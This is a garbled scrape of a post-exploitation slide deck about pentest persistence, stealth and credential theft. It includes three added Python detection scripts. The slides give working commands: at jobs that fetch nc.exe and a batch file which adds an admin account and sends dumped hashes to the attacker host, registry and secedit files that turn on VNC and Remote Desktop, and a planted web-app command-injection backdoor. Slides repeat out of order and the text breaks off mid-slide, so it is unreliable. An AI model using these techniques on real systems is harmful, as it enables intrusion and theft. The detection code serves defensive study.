bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
• DEMOS
Slide 30
Stealth / Evading Detection
Slide 31
Stealth / Evading Detection
• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing
Slide 32
Stealth / Evading Detection
• Why Stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities
Slide 33
Stealth / Evading Detection
• Goals
  – Keep system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS
Slide 34
Stealth / Evading Detection
• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode Encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research
Slide 35
Stealth / Evading Detection
• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another
Slide 36
Stealth / Evading Detection
• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious
Slide 37
Stealth / Evading Detection
• Using Windows security objects for stealth
  – Auditing of Securable Objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs
Slide 38
• DEMOS
  – Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change Identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My!
• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUto
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software
Slide 47
Feature Modification
• Feature Modification is basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access Objects programmatically
  – Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
  – Psexec was a great, awesome remote shell/command tool
  – Everybody now disables clipbook, which psexec requires (l4m3)
  – Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the service control tool sc.exe
  – net use \\target\ipc$ /user:username userpassword
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"
vnc.reg file contents:
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
  – No command line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
    • secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /Force
    • net start "terminal services"
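The three files in this procedure (vnc.reg on slide 51, fix_ts_policy.ini on slide 53, enable_ts.reg on slide 54) are plain text formats, which means a defender can parse exported copies and diff them against a baseline instead of eyeballing them. The following added Python example, which is not code from the talk, parses .reg exports and secedit templates and reports the specific changes these slides make: Remote Desktop turned on, the deny-logon rights emptied, a remote interactive logon grant, and a WinVNC password planted under the ORL key. The sample inputs are the slide files themselves (the vnc.reg sample is an excerpt); the finding wording is this example's own.

```python
"""Baseline checks over the two text formats the Remote Desktop / VNC
procedure uses: registry exports (.reg) and secedit templates (.ini).
Added example, not code from the talk; sample inputs are the files shown on
slides 51, 53 and 54, the finding wording is this example's own."""
import re

def parse_reg(text):
    """Parse a .reg export into {key: {value_name: raw_value}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'"?([^"=]+)"?=(.*)', line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(2)
    return keys

def parse_secedit_template(text):
    """Parse an INI-style secedit template into {section: {name: value}};
    names are lowercased because secedit treats them case-insensitively."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
            continue
        if "=" in line and current is not None:
            name, _, value = line.partition("=")
            sections[current][name.strip().lower()] = value.strip()
    return sections

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

def reg_findings(text):
    """Flag the Terminal Server values enable_ts.reg flips and any WinVNC
    password planted under the ORL key."""
    out, reg = [], parse_reg(text)
    ts = reg.get(TS_KEY, {})
    if ts.get("fDenyTSConnections") == "dword:00000000":
        out.append("Remote Desktop connections enabled (fDenyTSConnections=0)")
    if ts.get("TSEnabled") == "dword:00000001":
        out.append("Terminal Services enabled (TSEnabled=1)")
    for key, values in reg.items():
        if "\\ORL\\WinVNC3\\" in key and "Password" in values:
            out.append("WinVNC password written under " + key)
    return out

DENY_RIGHTS = ("sedenyinteractivelogonright",
               "sedenyremoteinteractivelogonright",
               "sedenynetworklogonright")

def template_findings(text):
    """Flag a template that empties deny-logon rights or grants remote
    interactive logon, as fix_ts_policy.ini does."""
    out = []
    rights = parse_secedit_template(text).get("Privilege Rights", {})
    for name in DENY_RIGHTS:
        if rights.get(name) == "":
            out.append("deny right cleared: " + name)
    granted = rights.get("seremoteinteractivelogonright", "")
    if granted:
        out.append("remote interactive logon granted to: " + granted)
    return out

# Sample inputs: the slide-54 .reg file, an excerpt of the slide-51 vnc.reg
# (key plus two values) and the slide-53 template.
ENABLE_TS_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""
VNC_REG_EXCERPT = r"""[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
"""
FIX_TS_POLICY_INI = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

if __name__ == "__main__":
    for f in (reg_findings(ENABLE_TS_REG) + reg_findings(VNC_REG_EXCERPT)
              + template_findings(FIX_TS_POLICY_INI)):
        print("FINDING:", f)
```

Run the same two parsers over `reg export` and `secedit /export` output taken from a host and compare the dictionaries with a known-good copy: the values these slides change (fDenyTSConnections, TSEnabled, the SeDeny*LogonRight entries, anything new under ORL\WinVNC3) are exactly the ones worth an alert, and a GPO that re-applies the baseline will otherwise quietly revert them without anyone noticing the attempt.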
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• AT command schedules things to run at a specified time and date
  – Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled
net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / Start Services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT
  – Flow
    • Establish authenticated session
    • Determine the time on the target
    • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i use GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes identified by IP back to attacker host
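Because AT jobs are visible to anyone who can query the scheduler, the slide-58 to slide-61 flow leaves a recognizable trail in an `at \\target` listing: a tftp transfer, a batch file a minute later, account and group changes, services switched to autostart. The following added Python example, which is not code from the talk, parses such a listing and flags those command-line indicators together with the "one minute from now" scheduling rhythm of slides 60 and 61. The listing and the indicator list are constructed for the example; 10.0.0.1 is a placeholder address.

```python
"""Triage of 'at \\target' job listings for the scheduler-abuse pattern on
slides 58-61. Added example, not code from the talk; the listing below is
constructed to look like the output of the Windows AT command, and the
indicator list is this example's own."""
import re
from datetime import datetime

AT_LINE = re.compile(
    r"^(?P<status>\S*)\s*(?P<id>\d+)\s+(?P<day>.+?)\s{2,}"
    r"(?P<time>\d{1,2}:\d{2}\s*[AP]M)\s+(?P<cmd>.+?)\s*$")

# (regex, reason) pairs; the commands are the ones the slides run through AT.
INDICATORS = [
    (re.compile(r"\btftp\b.*\b(get|put)\b", re.I), "tftp file transfer"),
    (re.compile(r"\bnet\s+user\b.*/add\b", re.I), "local account creation"),
    (re.compile(r"\bnet\s+localgroup\s+administrators\b.*/add\b", re.I),
     "administrators group change"),
    (re.compile(r"\.bat\b", re.I), "batch file execution"),
    (re.compile(r"\bsc\b.*\bconfig\b.*start=\s*auto", re.I), "service autostart change"),
]

def parse_at_listing(text):
    """Return a list of {status, id, day, time, cmd} dicts from AT output,
    skipping the column header and the dashed separator."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Status") or set(line.strip()) == {"-"}:
            continue
        m = AT_LINE.match(line)
        if m:
            job = m.groupdict()
            job["id"] = int(job["id"])
            jobs.append(job)
    return jobs

def job_minutes(job):
    """Minute-of-day for a job's wall-clock time, e.g. '12:01 PM' -> 721."""
    t = datetime.strptime(job["time"].replace(" ", ""), "%I:%M%p")
    return t.hour * 60 + t.minute

def triage(text, burst_window=2):
    """Return (job_id, reason) findings: command-line indicators plus jobs
    scheduled within burst_window minutes of another job on the same day,
    the 'run it one minute from now' rhythm of slides 60-61."""
    jobs = parse_at_listing(text)
    findings = []
    for job in jobs:
        for rx, reason in INDICATORS:
            if rx.search(job["cmd"]):
                findings.append((job["id"], reason))
    for a in jobs:
        for b in jobs:
            if a["id"] < b["id"] and a["day"] == b["day"] \
                    and abs(job_minutes(a) - job_minutes(b)) <= burst_window:
                findings.append((a["id"], f"scheduled within {burst_window} min of job {b['id']}"))
    return findings

# Constructed listing in the layout of 'at \\target'; the commands mirror
# the slide-58 and slide-61 examples (10.0.0.1 is a placeholder address).
SAMPLE_AT_OUTPUT = """\
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Today                   12:00 PM      tftp -i 10.0.0.1 GET e.bat
        2   Today                   12:01 PM      e.bat
        3   Each M T W Th F         6:00 PM       c:\\scripts\\backup.cmd
"""

if __name__ == "__main__":
    for job_id, reason in triage(SAMPLE_AT_OUTPUT):
        print(f"job {job_id}: {reason}")
```

The job listing only shows jobs that have not yet run, so this check belongs in a frequently scheduled sweep across hosts; since AT jobs run as SYSTEM by default (slide 59), a job created by a non-administrative process, or one whose command line fetches a file and runs it a minute later, is worth treating as an incident rather than a curiosity.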
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to:
    • All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42 then execute contents of Address field
  – URL encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find
Slide 27
Persistence
• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational ciphers (rot13, Caesar)
  – Even more complex obfuscation
Slide 28
Persistence
• Covert Accounts
  – Add an account / re-enable
    • Ex: SUPPORT_3848576b1, guest
  – Modify local account policies to allow access
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files or new accounts
  – Unlikely to be discovered
Slide 29
• DEMOS
Slide 30
Stealth / Evading Detection
Slide 31
Stealth / Evading Detection
• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing
Slide 32
Stealth / Evading Detection
• Why Stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities
Slide 33
Stealth / Evading Detection
• Goals
  – Keep system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS
Slide 34
Stealth / Evading Detection
• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research
Slide 35
Stealth / Evading Detection
• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another
Slide 36
Stealth / Evading Detection
• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious
Slide 37
Stealth / Evading Detection
• Using Windows security objects for stealth
  – Auditing of Securable Objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs
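An added example, not from the slides, of checking the point on slide 37 from the defender's side: parse the SDDL of a securable object and report whether its SACL would produce any audit events at all, so objects whose SACL has been nulled or emptied can be compared against a baseline. The SDDL strings are constructed; the script assumes the standard SDDL layout (O:, G:, D: and S: components, audit ACEs of type AU carrying the SA and/or FA flags).

```python
import re

# Constructed SDDL strings for four objects (the form returned by
# `(Get-Acl -Audit <path>).Sddl` or the ConvertSecurityDescriptorTo...
# API); not taken from any real host.  Only the S: (SACL) part matters here.
SAMPLE_SDDL = {
    "audited":      "O:BAG:SYD:(A;;FA;;;BA)(A;;FR;;;BU)S:(AU;SAFA;FA;;;WD)",
    "null_sacl":    "O:BAG:SYD:(A;;FA;;;BA)(A;;FR;;;BU)",
    "empty_sacl":   "O:BAG:SYD:(A;;FA;;;BA)(A;;FR;;;BU)S:",
    "failure_only": "O:BAG:SYD:(A;;FA;;;BA)S:(AU;FA;FA;;;WD)",
}

_COMPONENT = re.compile(r"(O|G|D|S):")   # component markers; ACE fields never contain ':'
_ACE = re.compile(r"\(([^)]*)\)")        # one parenthesised ACE string


def split_sddl(sddl):
    """Split an SDDL string into its O:, G:, D: and S: components."""
    parts = {}
    marks = list(_COMPONENT.finditer(sddl))
    for i, mark in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(sddl)
        parts[mark.group(1)] = sddl[mark.end():end]
    return parts


def parse_aces(component):
    """ACEs of a DACL/SACL component as dicts; control flags before the first '(' are ignored."""
    aces = []
    for match in _ACE.finditer(component):
        fields = match.group(1).split(";")
        if len(fields) < 6:
            continue  # not a well-formed ACE string
        aces.append({"type": fields[0], "flags": fields[1],
                     "rights": fields[2], "sid": fields[5]})
    return aces


def _flag_set(flags):
    """ACE flags are two-letter tokens run together, e.g. 'OICISAFA' -> {OI, CI, SA, FA}."""
    return {flags[i:i + 2] for i in range(0, len(flags), 2)}


def audit_status(sddl):
    """Classify what the object's SACL will actually audit."""
    parts = split_sddl(sddl)
    if "S" not in parts:
        return "NULL_SACL"            # no SACL at all: nothing is ever audited
    audit_aces = [a for a in parse_aces(parts["S"]) if a["type"] == "AU"]
    if not audit_aces:
        return "EMPTY_SACL"           # SACL present but no audit ACEs: same effect
    kinds = set()
    for ace in audit_aces:
        flags = _flag_set(ace["flags"])
        if "SA" in flags:
            kinds.add("success")
        if "FA" in flags:
            kinds.add("failure")
    if kinds == {"success", "failure"}:
        return "SUCCESS_AND_FAILURE"
    if kinds == {"success"}:
        return "SUCCESS_ONLY"
    if kinds == {"failure"}:
        return "FAILURE_ONLY"
    return "EMPTY_SACL"               # AU ACEs with neither flag audit nothing


def objects_without_auditing(sddl_by_name):
    """Names of objects whose effective auditing is off, to diff against a baseline."""
    return sorted(name for name, sddl in sddl_by_name.items()
                  if audit_status(sddl) in ("NULL_SACL", "EMPTY_SACL"))


if __name__ == "__main__":
    for name, sddl in SAMPLE_SDDL.items():
        print("%-13s %s" % (name, audit_status(sddl)))
```

Reading a SACL requires SeSecurityPrivilege, and the entries only generate events when the "Audit object access" policy is enabled, so a baseline check should also confirm that policy.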
Slide 38
• DEMOS
  – Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change Identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
  – Incognito (Metasploit)
